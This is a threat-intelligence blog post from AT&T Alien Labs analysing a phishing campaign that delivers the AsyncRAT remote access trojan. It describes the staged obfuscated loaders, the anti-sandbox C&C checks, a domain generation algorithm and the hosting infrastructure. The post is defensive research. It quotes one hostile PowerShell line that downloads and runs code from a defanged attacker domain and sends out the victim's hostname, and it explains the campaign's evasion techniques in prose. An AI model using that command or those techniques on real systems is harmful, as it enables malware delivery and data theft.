[By Fernando Martinez, Security Researcher, AT&T Alien Labs]
Research from AT&T Alien Labs has identified a campaign to deliver AsyncRAT onto unsuspecting victim systems. For at least 11 months, this threat actor has been working on delivering the Remote Access Trojan (RAT) through an initial JavaScript file, embedded in a phishing page. After more than 300 samples and over 100 domains later, the threat actor is persistent in their intentions.
What is AsyncRAT?
AsyncRAT is an open-source remote access tool released in 2019 and is still available in Github. As with any remote access tool, it can be leveraged as a Remote Access Trojan, especially in this case where it is free to access and use. For that reason, it is one of the most commonly used RATs; its characteristic elements include keylogging, exfiltration techniques, and/or initial access staging for final payload delivery.
Since it was initially released, this RAT has shown up in several campaigns with numerous alterations due to its open-sourced nature, even used by the APT Earth Berberoka as reported by TrendMicro.
In early September 2023, AT&T Alien Labs observed a spike in phishing emails, targeting specific individuals in certain companies. The gif attachment led to an svg file, which also led to a download of a highly obfuscated JavaScript file, followed by other obfuscated PowerShell scripts and a final execution of an AsyncRAT client. This peculiarity was also reported by some users in X (formerly Twitter), like reecDeep and Igal Lytzki. Certain patterns in the code allowed us to pivot and look for more samples in this campaign, resulting in samples going back to February 2023.
How it works
The modus operandi of the loader involves several stages which are further obfuscated by a Command and Control (C&C) server checking if the victim could be a sandbox prior to deploying the main AsyncRAT payload. In particular, when the C&C server doesn’t rely on the parameters sent, usually after stage 2, or when it is not expecting requests on a particular domain at that time, the C&C redirects to a benign page.
During the whole campaign, JavaScript files have been delivered to targeted victims through malicious phishing web pages. These files, despite clearly being a script, contain long strings that are commented out, with texts composed of randomly positioned words, with ‘Melville’, ‘church’, ‘chapter’ and ‘scottish’ being the most repeated words.
This script is highly obfuscated, with several functions to move around the detectable commands/strings, and with the URL to the C&C being encoded in the form of decimal values. In order to decrypt the URL, the script subtracts a constant from the value and converts the number into an ASCII (data encoding) character. For example, the following array of numbers (102 131 138 138 141 62 117 141 144 138 130 63), when subtracted by 30 and converted to ASCII, corresponds to the string ‘Hello World!’
On top of modifying the C&C and URL every so often, the threat actor tries to generate a completely new version of the loader for each victim. The new files carry new randomized variable names, or a new constant subtracted to get the ASCII representation of the URL, which makes detection techniques difficult to perform consistently.
After a GET request, the C&C sends a script over HTTP. This script contains base64 code, and the necessary functions to decode it. It is then “exclusively or’ed” (XOR’ed) against a hardcoded key in the script, unpacked with Gunzip, and copied to memory to execute the payload as fileless in PowerShell. Once again, all the code will have variables with long randomized strings, commands that are ciphered and need to be converted to ASCII, as well as functions to evade endpoint detection and response (EDR), static detections, and analysis by researchers.
After the decoding, decrypting and decompressing the code, the ending script can be summarized in the command ‘iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”)’ where ‘$env:computername’ is the victim’s hostname. The second variable ‘$wiqnfex’ is a number of around 12 digits representing a value for the probability that the infected machine is a Virtual Machine or Sandbox.
If the C&C considers the victim could be a VM or Sandbox, it returns a decoy sample attempting to look like AsyncRAT. However, when the sample is decompiled, it is named “DecoyClient”, contains swear words in Russian or “LOL” as variable names, in an attempt to mock researchers.
Understanding AsyncRAT’s Network Characteristics
The AsyncRAT code is constantly changing, heavily obfuscated and randomized, making it hard to detect. However, that is not the case for the network infrastructure. Based on our research, most domain structures associated with AsyncRAT share a few common characteristics:
- Top Level Domain (TLD): top
- 8 random alphanumeric characters
- Registrant organization: ‘Nicenic.net, Inc’ (the registrar)
- Country code South Africa (ZA)
- Created a few days before its use
When researching domains with similar uncommon characteristics (and when the Anti-Sandbox analysis is passed), a new set of domains appears. These samples had a script to calculate the domain based on the current date. This allows the samples to automatically change the C&C domain with time and evade being blocked if the code is not properly reviewed.
The Domain Generation Algorithm (DGA) generates a seed using the day of the year and modifies it. Part of these modifications ensure that a new domain is populated every seven days, with a new domain purposely generated every Sunday. Afterward, this seed is used to pick 15 letters from ‘a’ to ‘n’ to generate the domain. The other variables in the seed (i.e. 2024 and 6542) — or the characters used to create the domain — change in some of the scripts to generate a different pattern of domains.
On top of the matching characteristics of the registrant, the Autonomous System Numbers (ASN) also carry valuable data. The domains from the first group that were hardcoded within the samples our team observed were all hosted on BitLaunch, while the DGA domains were hosted on DigitalOcean.
DigitalOcean is a very popular host provider that requires no introduction. BitLaunch, on the other hand, is not as known among common users. This ASN with identifier 399629 is known for allowing payments in cryptocurrencies like: Bitcoin, Ethereum or Litecoin. This kind of offering is not malicious by itself, however, the type of user this model attracts includes cybercriminals, who primarily operate with crypto, and can leverage the anonymity of using certain cryptocurrencies. Additionally, BitLaunch can be used as a pay bridge for servers in DigitalOcean, Vultr or linode hosts. The cheapest option is to host with BitLaunch, but the alternative allows users to pay in crypto and get hosted in a more reliable ASN.
Going back to the DGA domains that were hosted in DigitalOcean, when looking at the scanning activity generated by OTX on the DGA domains, it shows a default webpage with the message ‘Welcome to the BitLaunch LEMP app. Log in to your server to configure your LEMP installation.’ This might be an indication that these domains are hosted in DigitalOcean but paid for through BitLaunch.
Overall, the described campaign shows how determined the threat actors are to infect their victims and go unnoticed, with hundreds of different samples during 2023. Additionally, the effort to obfuscate the samples and constantly make modifications to them demonstrates how the threat actors value discretion. However, this blog is living proof that studying the actors’ activity through the year allows us to identify them when they come back with any payload with a wide range of patterns tracked by AT&T Alien Labs.
The registration of domains and subsequent AsyncRAT samples are still being observed at the time of writing this article.
